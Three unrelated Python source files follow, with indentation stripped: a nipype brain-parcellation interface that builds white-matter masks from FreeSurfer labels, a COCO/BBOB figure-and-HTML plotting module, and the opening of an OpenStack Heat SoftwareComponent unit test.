# structuring elements for erosion
se1 = np.zeros((3, 3, 5))
se1[1, :, 2] = 1
se1[:, 1, 2] = 1
se1[1, 1, :] = 1
se = np.zeros((3, 3, 3))
se[1, :, 1] = 1
se[:, 1, 1] = 1
se[1, 1, :] = 1
# lateral ventricles, thalamus proper and caudate
# the latter two removed for better erosion, but put back afterwards
idx = np.where((asegd == 4) |
(asegd == 43) |
(asegd == 11) |
(asegd == 50) |
(asegd == 31) |
(asegd == 63) |
(asegd == 10) |
(asegd == 49))
csfA[idx] = 1
csfA = imerode(imerode(csfA, se1), se)
# thalmus proper and cuadate are put back because they are not lateral ventricles
idx = np.where((asegd == 11) |
(asegd == 50) |
(asegd == 10) |
(asegd == 49))
csfA[idx] = 0
# REST CSF, IE 3RD AND 4TH VENTRICULE AND EXTRACEREBRAL CSF
idx = np.where((asegd == 5) |
(asegd == 14) |
(asegd == 15) |
(asegd == 24) |
(asegd == 44) |
(asegd == 72) |
(asegd == 75) |
(asegd == 76) |
(asegd == 213) |
(asegd == 221))
# 43 ??, 4?? 213?, 221?
# more to discuss.
for i in [5, 14, 15, 24, 44, 72, 75, 76, 213, 221]:
idx = np.where(asegd == i)
csfB[idx] = 1
# do not remove the subthalamic nucleus for now from the wm mask
# 23, 60
# would stop the fiber going to the segmented "brainstem"
# grey nuclei, either with or without erosion
gr_ncl = np.zeros(asegd.shape)
# with erosion
for i in [10, 11, 12, 49, 50, 51]:
idx = np.where(asegd == i)
# temporary volume
tmp = np.zeros(asegd.shape)
tmp[idx] = 1
tmp = imerode(tmp, se)
idx = np.where(tmp == 1)
gr_ncl[idx] = 1
# without erosion
for i in [13, 17, 18, 26, 52, 53, 54, 58]:
idx = np.where(asegd == i)
gr_ncl[idx] = 1
# remove remaining structure, e.g. brainstem
remaining = np.zeros(asegd.shape)
idx = np.where(asegd == 16)
remaining[idx] = 1
# now remove all the structures from the white matter
idx = np.where(
(csfA != 0) | (csfB != 0) | (gr_ncl != 0) | (remaining != 0))
wmmask[idx] = 0
iflogger.info("Removing lateral ventricles and eroded grey nuclei and brainstem from white matter mask")
# ADD voxels from 'cc_unknown.nii.gz' dataset
ccun = nb.load(op.join(fs_dir, 'label', 'cc_unknown.nii.gz'))
ccund = ccun.get_data()
idx = np.where(ccund != 0)
iflogger.info("Add corpus callosum and unknown to wm mask")
wmmask[idx] = 1
# check if we should subtract the cortical rois from this parcellation
iflogger.info("Loading %s to subtract cortical ROIs from white matter mask" % ('ROI_%s.nii.gz' % parcellation_name))
roi = nb.load(op.join(op.curdir, 'ROI_%s.nii.gz' % parcellation_name))
roid = roi.get_data()
assert roid.shape[0] == wmmask.shape[0]
pg = nx.read_graphml(pgpath)
for brk, brv in pg.nodes_iter(data=True):
if brv['dn_region'] == 'cortical':
iflogger.info("Subtracting region %s with intensity value %s" %
(brv['dn_region'], brv['dn_correspondence_id']))
idx = np.where(roid == int(brv['dn_correspondence_id']))
wmmask[idx] = 0
# output white matter mask. crop and move it afterwards
wm_out = op.join(fs_dir, 'mri', 'fsmask_1mm.nii.gz')
img = nb.Nifti1Image(wmmask, fsmask.get_affine(), fsmask.get_header())
iflogger.info("Save white matter mask: %s" % wm_out)
nb.save(img, wm_out)
def crop_and_move_datasets(subject_id, subjects_dir, fs_dir, parcellation_name, out_roi_file,dilation):
fs_dir = op.join(subjects_dir, subject_id)
cmp_config = cmp.configuration.PipelineConfiguration()
cmp_config.parcellation_scheme = "Lausanne2008"
log = cmp_config.get_logger()
output_dir = op.abspath(op.curdir)
iflogger.info("Cropping and moving datasets to %s" % output_dir)
ds = [
(op.join(fs_dir, 'mri', 'aseg.nii.gz'),
op.abspath('aseg.nii.gz')),
(op.join(fs_dir, 'mri', 'ribbon.nii.gz'),
op.abspath('ribbon.nii.gz')),
(op.join(fs_dir, 'mri', 'fsmask_1mm.nii.gz'),
op.abspath('fsmask_1mm.nii.gz')),
(op.join(fs_dir, 'label', 'cc_unknown.nii.gz'),
op.abspath('cc_unknown.nii.gz'))
]
ds.append((op.abspath('ROI_%s.nii.gz' % parcellation_name),
op.abspath('ROI_HR_th.nii.gz')))
if(dilation==True):
ds.append((op.abspath('ROIv_%s.nii.gz' % parcellation_name),
op.abspath('ROIv_HR_th.nii.gz')))
orig = op.join(fs_dir, 'mri', 'orig', '001.mgz')
for d in ds:
iflogger.info("Processing %s:" % d[0])
if not op.exists(d[0]):
raise Exception('File %s does not exist.' % d[0])
# reslice to original volume because the roi creation with freesurfer
# changed to 256x256x256 resolution
mri_cmd = 'mri_convert -rl "%s" -rt nearest "%s" -nc "%s"' % (
orig, d[0], d[1])
runCmd(mri_cmd, log)
def extract(Z, shape, position, fill):
""" Extract voxel neighbourhood
Parameters
----------
Z: the original data
shape: tuple containing neighbourhood dimensions
position: tuple containing central point indexes
fill: value for the padding of Z
Returns
-------
R: the neighbourhood of the specified point in Z
"""
R = np.ones(shape, dtype=Z.dtype) * \
fill # initialize output block to the fill value
P = np.array(
list(position)).astype(int) # position coordinates(numpy array)
Rs = np.array(
list(R.shape)).astype(int) # output block dimensions (numpy array)
Zs = np.array(
list(Z.shape)).astype(int) # original volume dimensions (numpy array)
R_start = np.zeros(len(shape)).astype(int)
R_stop = np.array(list(shape)).astype(int)
Z_start = (P - Rs // 2)
Z_start_cor = (np.maximum(Z_start, 0)).tolist() # handle borders
R_start = R_start + (Z_start_cor - Z_start)
Z_stop = (P + Rs // 2) + Rs % 2
Z_stop_cor = (np.minimum(Z_stop, Zs)).tolist() # handle borders
R_stop = R_stop - (Z_stop - Z_stop_cor)
R[R_start[0]:R_stop[0], R_start[1]:R_stop[1], R_start[2]:R_stop[2]] = Z[Z_start_cor[0]:Z_stop_cor[0], Z_start_cor[1]:Z_stop_cor[1], Z_start_cor[2]:Z_stop_cor[2]]
return R
class ParcellateInputSpec(BaseInterfaceInputSpec):
subject_id = traits.String(mandatory=True, desc='Subject ID')
parcellation_name = traits.Enum('scale500', ['scale33', 'scale60', 'scale125', 'scale250', 'scale500'], usedefault=True)
freesurfer_dir = Directory(exists=True, desc='Freesurfer main directory')
subjects_dir = Directory(exists=True, desc='Freesurfer subjects directory')
out_roi_file = File(
genfile=True, desc='Region of Interest file for connectivity mapping')
dilation = traits.Bool(False, usedefault=True,
desc='Dilate cortical parcels? Useful for fMRI connectivity')
class ParcellateOutputSpec(TraitedSpec):
roi_file = File(
exists=True, desc='Region of Interest file for connectivity mapping')
roiv_file = File(desc='Region of Interest file for fMRI connectivity mapping')
white_matter_mask_file = File(exists=True, desc='White matter mask file')
cc_unknown_file = File(
desc='Image file with regions labelled as unknown cortical structures',
exists=True)
ribbon_file = File(desc='Image file detailing the cortical ribbon',
exists=True)
aseg_file = File(
desc='Automated segmentation file converted from Freesurfer "subjects" directory',
exists=True)
roi_file_in_structural_space = File(
desc='ROI image resliced to the dimensions of the original structural image',
exists=True)
dilated_roi_file_in_structural_space = File(
desc='dilated ROI image resliced to the dimensions of the original structural image')
class Parcellate(BaseInterface):
"""Subdivides segmented ROI file into smaller subregions
This interface implements the same procedure as in the ConnectomeMapper's
parcellation stage (cmp/stages/parcellation/maskcreation.py) for a single
parcellation scheme (e.g. 'scale500').
Example
-------
>>> import nipype.interfaces.cmtk as cmtk
>>> parcellate = cmtk.Parcellate()
>>> parcellate.inputs.freesurfer_dir = '.'
>>> parcellate.inputs.subjects_dir = '.'
>>> parcellate.inputs.subject_id = 'subj1'
>>> parcellate.inputs.dilation = True
>>> parcellate.inputs.parcellation_name = 'scale500'
>>> parcellate.run() # doctest: +SKIP
"""
input_spec = ParcellateInputSpec
output_spec = ParcellateOutputSpec
def _run_interface(self, runtime):
if self.inputs.subjects_dir:
os.environ.update({'SUBJECTS_DIR': self.inputs.subjects_dir})
if not os.path.exists(op.join(self.inputs.subjects_dir, self.inputs.subject_id)):
raise Exception
iflogger.info("ROI_HR_th.nii.gz / fsmask_1mm.nii.gz CREATION")
iflogger.info("=============================================")
create_annot_label(self.inputs.subject_id, self.inputs.subjects_dir, self.inputs.freesurfer_dir, self.inputs.parcellation_name)
create_roi(self.inputs.subject_id, self.inputs.subjects_dir, self.inputs.freesurfer_dir, self.inputs.parcellation_name, self.inputs.dilation)
create_wm_mask(self.inputs.subject_id, self.inputs.subjects_dir, self.inputs.freesurfer_dir, self.inputs.parcellation_name)
crop_and_move_datasets(self.inputs.subject_id, self.inputs.subjects_dir, self.inputs.freesurfer_dir, self.inputs.parcellation_name, self.inputs.out_roi_file,self.inputs.dilation)
return runtime
def _list_outputs(self):
outputs = self._outputs().get()
if isdefined(self.inputs.out_roi_file):
outputs['roi_file'] = op.abspath(self.inputs.out_roi_file)
else:
outputs['roi_file'] = op.abspath(
self._gen_outfilename('nii.gz', 'ROI'))
if(self.inputs.dilation==True):
outputs['roiv_file'] = op.abspath(self._gen_outfilename(
'nii.gz', 'ROIv'))
outputs['white_matter_mask_file'] = op.abspath('fsmask_1mm.nii.gz')
outputs['cc_unknown_file'] = op.abspath('cc_unknown.nii.gz')
outputs['ribbon_file'] = op.abspath('ribbon.nii.gz')
outputs['aseg_file'] = op.abspath('aseg.nii.gz')
outputs['roi_file_in_structural_space'] = op.abspath(
'ROI_HR_th.nii.gz')
if(self.inputs.dilation==True):
outputs['dilated_roi_file_in_structural_space'] = op.abspath(
'ROIv_HR_th.nii.gz')
return outputs
def _gen_outfilename(self, ext, prefix='ROI'):
return prefix + '_' + self.inputs.parcellation_name + '.' + ext
| |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""Generic routines for figure generation."""
from __future__ import absolute_import
import os
from collections import OrderedDict
from operator import itemgetter
from itertools import groupby
import warnings
import numpy as np
from matplotlib import pyplot as plt
import shutil
# from pdb import set_trace
from . import genericsettings, toolsstats, htmldesc # absolute_import => . refers to where ppfig resides in the package
bbox_inches_choices = { # do we also need pad_inches = 0?
'svg': 'tight',
}
def enum(*sequential, **named):
enums = dict(zip(sequential, range(len(sequential))), **named)
return type('Enum', (), enums)
AlgorithmCount = enum('NON_SPECIFIED', 'ONE', 'TWO', 'MANY')
def saveFigure(filename, figFormat=(), verbose=True):
"""Save figure into an image file.
`figFormat` can be a string or a list of strings, like
``('pdf', 'svg')``
"""
if not figFormat:
figFormat=genericsettings.getFigFormats()
if isinstance(figFormat, basestring):
figFormat = (figFormat, )
for format in figFormat:
# a hack for making smaller figures for browser display
if format == 'svg':
svg_downsize_factor = 0.8
# plt.rcParams['font.size'] *= 0.7
# plt.plot(plt.xlim()[0], plt.ylim()[0], '.')
# pretty desperate way to get a smaller figure
plt.gcf().set_size_inches([svg_downsize_factor * v for v in
plt.gcf().get_size_inches()])
try:
plt.savefig(filename + '.' + format,
dpi = 60 if genericsettings.in_a_hurry else 300,
format=format,
bbox_inches=bbox_inches_choices.get(format, None)
)
if verbose:
print 'Wrote figure in %s.' %(filename + '.' + format)
except IOError:
warnings.warn('%s is not writeable.' % (filename + '.' + format))
if format == 'svg':
plt.gcf().set_size_inches([v / svg_downsize_factor for v in
plt.gcf().get_size_inches()])
html_header = """<HTML>
<HEAD>
<META NAME="description" CONTENT="COCO/BBOB figures by function">
<META NAME="keywords" CONTENT="COCO, BBOB">
<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1">
<TITLE> %s </TITLE>
<SCRIPT SRC="sorttable.js"></SCRIPT>
</HEAD>
<BODY>
<H1> %s
</H1>
<H2 style="color:red"> %s </H2>
"""
def next_dimension_str(s):
try:
dim = int(s.strip().strip('_').rstrip('D'))
return s.replace('%02d' % dim, '%02d' % next_dimension(dim))
except:
warnings.warn('next_dimension_str failed on "%s"' % s)
print(s)
raise
def next_dimension(dim):
"""next dimension when clicking single function html pages"""
if dim == 2:
return 3
if dim == 3:
return 5
if dim == 40:
return 2
return 2 * dim
def save_single_functions_html(filename, algname='', extension='svg',
add_to_names = '', algorithmCount = AlgorithmCount.NON_SPECIFIED,
values_of_interest = []):
name = filename.split(os.sep)[-1]
with open(filename + add_to_names + '.html', 'w') as f:
header_title = algname + ' ' + name + add_to_names
imageWarning = '' if extension in genericsettings.getFigFormats() else 'For generating figures use the --svg option.'
f.write(html_header % (header_title.strip().replace(' ', ', '), algname, imageWarning))
captionStringFormat = '<p/>\n%s\n<p/><p/>'
if algorithmCount is AlgorithmCount.ONE:
headerERT = 'Expected number of <i>f</i>-evaluations to reach target'
f.write("<H2> %s </H2>\n" % headerERT)
if add_to_names.endswith('D'):
name_for_click = next_dimension_str(add_to_names)
f.write('<A HREF="%s">\n' % (filename.split(os.sep)[-1] + name_for_click + '.html'))
for ifun in range(1, 25):
f.write('<IMG SRC="ppfigdim_f%03d' % (ifun)
+ add_to_names + '.%s">' % (extension))
if add_to_names.endswith('D'):
f.write('"\n</A>\n')
key = 'bbobppfigdimlegendrlbased' if genericsettings.runlength_based_targets else 'bbobppfigdimlegendfixed'
joined_values_of_interest = ', '.join(values_of_interest.labels()) if genericsettings.runlength_based_targets else ', '.join(values_of_interest.loglabels())
f.write(captionStringFormat % htmldesc.getValue('##' + key + '##')
.replace('valuesofinterest', joined_values_of_interest))
headerERT = 'ERT in number of function evaluations'
f.write("<H2> %s </H2>\n" % headerERT)
f.write("\n<!--pptableHtml-->\n")
f.write(captionStringFormat % htmldesc.getValue('##bbobpptablecaption##'))
names = ['pprldistr', 'ppfvdistr']
dimensions = [5, 20]
types = OrderedDict([
('separ', 'Separable functions'),
('lcond', 'Misc. moderate functions'),
('hcond', 'Ill-conditioned functions'),
('multi', 'Multi-modal functions'),
('mult2', 'Weak structure functions'),
('noiselessall', 'All functions')])
headerECDF = ' Empirical cumulative distribution functions (ECDF)'
f.write("<H2> %s </H2>\n" % headerECDF)
for dimension in dimensions:
for typeKey, typeValue in types.iteritems():
f.write('<p><b>%s in %d-D</b></p>' % (typeValue, dimension))
f.write('<div>')
for name in names:
f.write('<IMG SRC="%s_%02dD_%s.%s">' % (name, dimension, typeKey, extension))
f.write('</div>')
key = 'bbobpprldistrlegendrlbased' if genericsettings.runlength_based_targets else 'bbobpprldistrlegendfixed'
f.write(captionStringFormat % htmldesc.getValue('##' + key + '##'))
headerERTLoss = 'ERT loss ratios'
f.write("<H2> %s </H2>\n" % headerERTLoss)
for dimension in dimensions:
f.write('<IMG SRC="pplogloss_%02dD_noiselessall.%s">' % (dimension, extension))
f.write("\n<!--tables-->\n")
f.write(captionStringFormat % htmldesc.getValue('##bbobloglosstablecaption##'))
types = OrderedDict([
('separ', 'Separable functions'),
('lcond', 'Moderate functions'),
('hcond', 'Ill-conditioned functions'),
('multi', 'Multi-modal functions'),
('mult2', 'Weak structure functions')])
for typeKey, typeValue in types.iteritems():
f.write('<p><b>%s in %s</b></p>' % (typeValue, '-D and '.join(str(x) for x in dimensions) + '-D'))
f.write('<div>')
for dimension in dimensions:
f.write('<IMG SRC="pplogloss_%02dD_%s.%s">' % (dimension, typeKey, extension))
f.write('</div>')
f.write(captionStringFormat % htmldesc.getValue('##bbobloglossfigurecaption##'))
elif algorithmCount is AlgorithmCount.TWO:
headerERT = 'Scaling of ERT with dimension'
f.write("\n<H2> %s </H2>\n" % headerERT)
for ifun in range(1, 25):
f.write('<IMG SRC="ppfigs_f%03d' % (ifun)
+ add_to_names + '.%s">' % (extension))
f.write(captionStringFormat % '##bbobppfigslegend##')
headerERT = 'Scatter plots per function'
f.write("\n<H2> %s </H2>\n" % headerERT)
if add_to_names.endswith('D'):
name_for_click = next_dimension_str(add_to_names)
f.write('<A HREF="%s">\n' % (filename.split(os.sep)[-1] + name_for_click + '.html'))
for ifun in range(1, 25):
f.write('<IMG SRC="ppscatter_f%03d' % (ifun)
+ add_to_names + '.%s">' % (extension))
if add_to_names.endswith('D'):
f.write('"\n</A>\n')
f.write(captionStringFormat % '##bbobppscatterlegend##')
names = ['pprldistr', 'pplogabs']
dimensions = [5, 20]
types = OrderedDict([
('separ', 'Separable functions'),
('lcond', 'Moderate functions'),
('hcond', 'Ill-conditioned functions'),
('multi', 'Multi-modal functions'),
('mult2', 'Weak structure functions'),
('noiselessall', 'All functions')])
headerECDF = 'Empirical cumulative distribution functions (ECDFs) per function group'
f.write("\n<H2> %s </H2>\n" % headerECDF)
for dimension in dimensions:
for typeKey, typeValue in types.iteritems():
f.write('<p><b>%s in %d-D</b></p>' % (typeValue, dimension))
f.write('<div>')
for name in names:
f.write('<IMG SRC="%s_%02dD_%s.%s">' % (name, dimension, typeKey, extension))
f.write('</div>')
key = 'bbobpprldistrlegendtworlbased' if genericsettings.runlength_based_targets else 'bbobpprldistrlegendtwofixed'
f.write(captionStringFormat % htmldesc.getValue('##' + key + '##'))
headerERT = 'Table showing the ERT in number of function evaluations divided by the best ERT measured during BBOB-2009'
f.write("\n<H2> %s </H2>\n" % headerERT)
f.write("\n<!--pptable2Html-->\n")
f.write(captionStringFormat % '##bbobpptablestwolegend##')
elif algorithmCount is AlgorithmCount.MANY:
headerERT = 'Scaling of ERT with dimension'
f.write("\n<H2> %s </H2>\n" % headerERT)
if add_to_names.endswith('D'):
name_for_click = next_dimension_str(add_to_names)
f.write('<A HREF="%s">\n' % (filename.split(os.sep)[-1] + name_for_click + '.html'))
for ifun in range(1, 25):
f.write('<IMG SRC="ppfigs_f%03d' % (ifun)
+ add_to_names + '.%s">' % (extension))
if add_to_names.endswith('D'):
f.write('"\n</A>\n')
f.write(captionStringFormat % '##bbobppfigslegend##')
write_ECDF(f, 5, extension, captionStringFormat)
write_ECDF(f, 20, extension, captionStringFormat)
write_pptables(f, 5, captionStringFormat)
write_pptables(f, 20, captionStringFormat)
elif algorithmCount is AlgorithmCount.NON_SPECIFIED:
headerERT = 'Scaling of ERT with dimension'
f.write("\n<H2> %s </H2>\n" % headerERT)
if add_to_names.endswith('D'):
name_for_click = next_dimension_str(add_to_names)
f.write('<A HREF="%s">\n' % (name + name_for_click + '.html'))
for ifun in range(1, 25):
f.write('<IMG SRC="'+ name + '_f%03d' % (ifun)
+ add_to_names + '.%s">' % (extension))
if add_to_names.endswith('D'):
f.write('"\n</A>\n')
f.write("\n</BODY>\n</HTML>")
def write_ECDF(f, dimension, extension, captionStringFormat):
"""Writes line for ECDF images."""
names = ['pprldmany']
types = OrderedDict([
('separ', 'Separable functions'),
('lcond', 'Moderate functions'),
('hcond', 'Ill-conditioned functions'),
('multi', 'Multi-modal functions'),
('mult2', 'Weakly structured multi-modal functions'),
('noiselessall', 'All functions')])
headerECDF = 'Empirical Cumulative Distribution Functions (ECDFs) per function group for dimension %d' % dimension
f.write("\n<H2> %s </H2>\n" % headerECDF)
for typeKey, typeValue in types.iteritems():
f.write('<p><b>%s</b></p>' % typeValue)
for name in names:
f.write('<IMG SRC="%s_%02dD_%s.%s">' % (name, dimension, typeKey, extension))
f.write(captionStringFormat % ('\n##bbobECDFslegend%d##' % dimension))
def write_pptables(f, dimension, captionStringFormat):
"""Writes line for pptables images."""
headerERT = 'Table showing the ERT in number of function evaluations divided by' \
'the best ERT measured during BBOB-2009 for dimension %d' % dimension
f.write("\n<H2> %s </H2>\n" % headerERT)
for ifun in range(1, 25):
f.write("\n<!--pptablesf%03d%02dDHtml-->\n" % (ifun, dimension))
if genericsettings.isTab:
key = 'bbobpptablesmanylegendexpensive' if genericsettings.isExpensive else 'bbobpptablesmanylegend'
f.write(captionStringFormat % htmldesc.getValue('##' + key + str(dimension) + '##'))
def copy_js_files(outputdir):
"""Copies js files to output directory."""
js_folder = os.path.join(os.path.dirname(os.path.realpath(__file__)), 'js')
for file in os.listdir(js_folder):
if file.endswith(".js"):
shutil.copy(os.path.join(js_folder, file), outputdir)
def discretize_limits(limits, smaller_steps_limit=3.1):
"""return new limits with discrete values in k * 10**i with k in [1, 3].
`limits` has len 2 and the new lower limit is always ``10**-0.2``.
if `limits[1] / limits[0] < 10**smaller_steps_limits`, k == 3 is an
additional choice.
"""
ymin, ymax = limits
ymin=np.max((ymin, 10**-0.2))
ymax=int(ymax + 1)
ymax_new = 10**np.ceil(np.log10(ymax)) * (1 + 1e-6)
if 3. * ymax_new / 10 > ymax and np.log10(ymax / ymin) < smaller_steps_limit:
ymax_new *= 3. / 10
ymin_new = 10**np.floor(np.log10(ymin)) / (1 + 1e-6)
if 11 < 3 and 3 * ymin_new < ymin and np.log10(ymax / ymin) < 1.1:
ymin_new *= 3
if ymin_new < 1.1:
ymin_new = 10**-0.2
ymin_new = 10**-0.2
return ymin_new, ymax_new
def marker_positions(xdata, ydata, nbperdecade, maxnb,
ax_limits=None, y_transformation=None):
"""return randomized marker positions
replacement for downsample, could be improved by becoming independent
of axis limits?
"""
if ax_limits is None: # use current axis limits
ax_limits = plt.axis()
tfy = y_transformation
if tfy is None:
tfy = lambda x: x # identity
xdatarange = np.log10(max([max(xdata), ax_limits[0], ax_limits[1]]) + 0.5) - \
np.log10(min([min(xdata), ax_limits[0], ax_limits[1]]) + 0.5) #np.log10(xdata[-1]) - np.log10(xdata[0])
ydatarange = tfy(max([max(ydata), ax_limits[2], ax_limits[3]]) + 0.5) - \
tfy(min([min(ydata), ax_limits[2], ax_limits[3]]) + 0.5) # tfy(ydata[-1]) - tfy(ydata[0])
nbmarkers = np.min([maxnb, nbperdecade +
np.ceil(nbperdecade * (1e-99 + np.abs(np.log10(max(xdata)) - np.log10(min(xdata)))))])
probs = np.abs(np.diff(np.log10(xdata))) / xdatarange + \
np.abs(np.diff(tfy(ydata))) / ydatarange
xpos = []
ypos= []
if sum(probs) > 0:
xoff = np.random.rand() / nbmarkers
probs /= sum(probs)
cum = np.cumsum(probs)
for xact in np.arange(0, 1, 1./nbmarkers):
pos = xoff + xact + (1./nbmarkers) * (0.3 + 0.4 * np.random.rand())
idx = np.abs(cum - pos).argmin() # index of closest value
xpos.append(xdata[idx])
ypos.append(ydata[idx])
xpos.append(xdata[-1])
ypos.append(ydata[-1])
return xpos, ypos
def plotUnifLogXMarkers(x, y, nbperdecade, logscale=False, **kwargs):
"""Proxy plot function: markers are evenly spaced on the log x-scale
Remark/TODO: should be called plot_with_unif_markers!? Here is where
the ECDF plot "done in pprldmany" actually happens.
This method generates plots with markers regularly spaced on the
x-scale whereas the matplotlib.pyplot.plot function will put markers
on data points.
This method outputs a list of three lines.Line2D objects: the first
with the line style, the second for the markers and the last for the
label.
This function only works with monotonous graph.
"""
res = plt.plot(x, y, **kwargs) # shouldn't this be done in the calling code?
if 'marker' in kwargs and len(x) > 0:
# x2, y2 = downsample(x, y)
x2, y2 = marker_positions(x, y, nbperdecade, 19, plt.axis(),
np.log10 if logscale else None)
res2 = plt.plot(x2, y2)
for i in res2:
i.update_from(res[0]) # copy all attributes of res
plt.setp(res2, linestyle='', label='')
res.extend(res2)
if 'label' in kwargs:
res3 = plt.plot([], [], **kwargs)
for i in res3:
i.update_from(res[0]) # copy all attributes of res
res.extend(res3)
plt.setp(res[0], marker='', label='')
return res
def consecutiveNumbers(data, prefix = ''):
"""Groups a sequence of integers into ranges of consecutive numbers.
If the prefix is set then the it's placed before each number.
Example::
>>> import os
>>> os.chdir(os.path.abspath(os.path.dirname(os.path.dirname('__file__'))))
>>> import bbob_pproc as bb
>>> bb.ppfig.consecutiveNumbers([0, 1, 2, 4, 5, 7, 8, 9])
'0-2, 4, 5, 7-9'
>>> bb.ppfig.consecutiveNumbers([0, 1, 2, 4, 5, 7, 8, 9], 'f')
'f0-f2, f4, f5, f7-f9'
Range of consecutive numbers is at least 3 (therefore [4, 5] is
represented as "4, 5").
"""
res = []
tmp = groupByRange(data)
for i in tmp:
tmpstring = list(prefix + str(j) for j in i)
if len(i) <= 2 : # This means length of ranges are at least 3
res.append(', '.join(tmpstring))
else:
res.append('-'.join((tmpstring[0], tmpstring[-1])))
return ', '.join(res)
def groupByRange(data):
"""Groups a sequence of integers into ranges of consecutive numbers.
Helper function of consecutiveNumbers(data), returns a list of lists.
The key to the solution is differencing with a range so that
consecutive numbers all appear in same group.
Useful for determining ranges of functions.
Ref: http://docs.python.org/release/3.0.1/library/itertools.html
"""
res = []
for _k, g in groupby(enumerate(data), lambda (i,x):i-x):
res.append(list(i for i in map(itemgetter(1), g)))
return res
def logxticks(limits=[-np.inf, np.inf]):
"""Modify log-scale figure xticks from 10^i to i for values with the
``limits`` and (re-)sets the current xlim() thereby turning autoscale
off (if it was on).
This is to have xticks that are more visible.
Modifying the x-limits of the figure after calling this method will
not update the ticks.
Please make sure the xlabel is changed accordingly.
"""
_xticks = plt.xticks()
xlims = plt.xlim()
newxticks = []
for j in _xticks[0]:
if j > limits[0] and j < limits[1]: # tick annotations only within the limits
newxticks.append('%d' % round(np.log10(j)))
else:
newxticks.append('')
plt.xticks(_xticks[0], newxticks) # this changes the limits (only in newer versions of mpl?)
plt.xlim(xlims[0], xlims[1])
# TODO: check the xlabel is changed accordingly?
def beautify():
""" Customize a figure by adding a legend, axis label, etc."""
# TODO: what is this function for?
# Input checking
# Get axis handle and set scale for each axis
axisHandle = plt.gca()
axisHandle.set_yscale("log")
# Grid options
axisHandle.grid(True)
_ymin, ymax = plt.ylim()
plt.ylim(ymin=10**-0.2, ymax=ymax) # Set back the default maximum.
tmp = axisHandle.get_yticks()
tmp2 = []
for i in tmp:
tmp2.append('%d' % round(np.log10(i)))
axisHandle.set_yticklabels(tmp2)
axisHandle.set_ylabel('log10 of ERT')
def generateData(dataSet, targetFuncValue):
"""Returns an array of results to be plotted.
1st column is ert, 2nd is the number of success, 3rd the success
rate, 4th the sum of the number of function evaluations, and
finally the median on successful runs.
"""
it = iter(reversed(dataSet.evals))
i = it.next()
prev = np.array([np.nan] * len(i))
while i[0] <= targetFuncValue:
prev = i
try:
i = it.next()
except StopIteration:
break
data = prev[1:].copy() # keep only the number of function evaluations.
# was up to rev4997: succ = (np.isnan(data) == False) # better: ~np.isnan(data)
succ = np.isfinite(data)
if succ.any():
med = toolsstats.prctile(data[succ], 50)[0]
#Line above was modified at rev 3050 to make sure that we consider only
#successful trials in the median
else:
med = np.nan
# prepare to compute runlengths / ERT with restarts (AKA SP1)
data[np.isnan(data)] = dataSet.maxevals[np.isnan(data)]
res = []
res.extend(toolsstats.sp(data, issuccessful=succ, allowinf=False))
res.append(np.mean(data)) #mean(FE)
res.append(med)
return np.array(res)
def plot(dsList, _valuesOfInterest=(10, 1, 1e-1, 1e-2, 1e-3, 1e-5, 1e-8),
isbyinstance=True, kwargs={}):
"""From a DataSetList, plot a graph. Not in use and superseeded by ppfigdim.main!?"""
#set_trace()
res = []
valuesOfInterest = list(_valuesOfInterest)
valuesOfInterest.sort(reverse=True)
def transform(dsList):
"""Create dictionary of instances."""
class StrippedUpDS():
"""Data Set stripped up of everything."""
pass
res = {}
for i in dsList:
dictinstance = i.createDictInstance()
for j, idx in dictinstance.iteritems():
tmp = StrippedUpDS()
idxs = list(k + 1 for k in idx)
idxs.insert(0, 0)
tmp.evals = i.evals[:, np.r_[idxs]].copy()
tmp.maxevals = i.maxevals[np.ix_(idx)].copy()
res.setdefault(j, [])
res.get(j).append(tmp)
return res
for i in range(len(valuesOfInterest)):
succ = []
unsucc = []
displaynumber = []
data = []
dictX = transform(dsList)
for x in sorted(dictX.keys()):
dsListByX = dictX[x]
for j in dsListByX:
tmp = generateData(j, valuesOfInterest[i])
if tmp[2] > 0: #Number of success is larger than 0
succ.append(np.append(x, tmp))
if tmp[2] < j.nbRuns():
displaynumber.append((x, tmp[0], tmp[2]))
else:
unsucc.append(np.append(x, tmp))
if succ:
tmp = np.vstack(succ)
#ERT
res.extend(plt.plot(tmp[:, 0], tmp[:, 1], **kwargs))
#median
tmp2 = plt.plot(tmp[:, 0], tmp[:, -1], **kwargs)
plt.setp(tmp2, linestyle='', marker='+', markersize=30, markeredgewidth=5)
#, color=colors[i], linestyle='', marker='+', markersize=30, markeredgewidth=5))
res.extend(tmp2)
# To have the legend displayed whatever happens with the data.
tmp = plt.plot([], [], **kwargs)
plt.setp(tmp, label=' %+d' % (np.log10(valuesOfInterest[i])))
res.extend(tmp)
#Only for the last target function value
if unsucc:
tmp = np.vstack(unsucc) # tmp[:, 0] needs to be sorted!
res.extend(plt.plot(tmp[:, 0], tmp[:, 1], **kwargs))
if displaynumber: # displayed only for the smallest valuesOfInterest
for j in displaynumber:
t = plt.text(j[0], j[1]*1.85, "%.0f" % j[2],
horizontalalignment="center",
verticalalignment="bottom")
res.append(t)
return res
| |
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import mock
import six
from heat.common import exception as exc
from heat.common import template_format
from heat.engine import stack
from heat.engine import template
from heat.tests import common
from heat.tests import utils
class SoftwareComponentTest(common.HeatTestCase):
def setUp(self):
super(SoftwareComponentTest, self).setUp()
self.ctx = utils.dummy_context()
tpl = '''
heat_template_version: 2013-05-23
resources:
mysql_component:
type: OS::Heat::SoftwareComponent
properties:
configs:
- actions: [CREATE]
config: |
#!/bin/bash
echo "Create MySQL"
tool: script
- actions: [UPDATE]
config: |
#!/bin/bash
echo "Update MySQL"
tool: script
inputs:
- name: mysql_port
outputs:
- name: root_password
'''
self.template = template_format.parse(tpl)
self.stack = stack.Stack(
self.ctx, 'software_component_test_stack',
template.Template(self.template))
self.component = self.stack['mysql_component']
self.rpc_client = mock.MagicMock()
self.component._rpc_client = self.rpc_client
def test_handle_create(self):
config_id = 'c8a19429-7fde-47ea-a42f-40045488226c'
value = {'id': config_id}
self.rpc_client.create_software_config.return_value = value
props = dict(self.component.properties)
self.component.handle_create()
self.rpc_client.create_software_config.assert_called_with(
self.ctx,
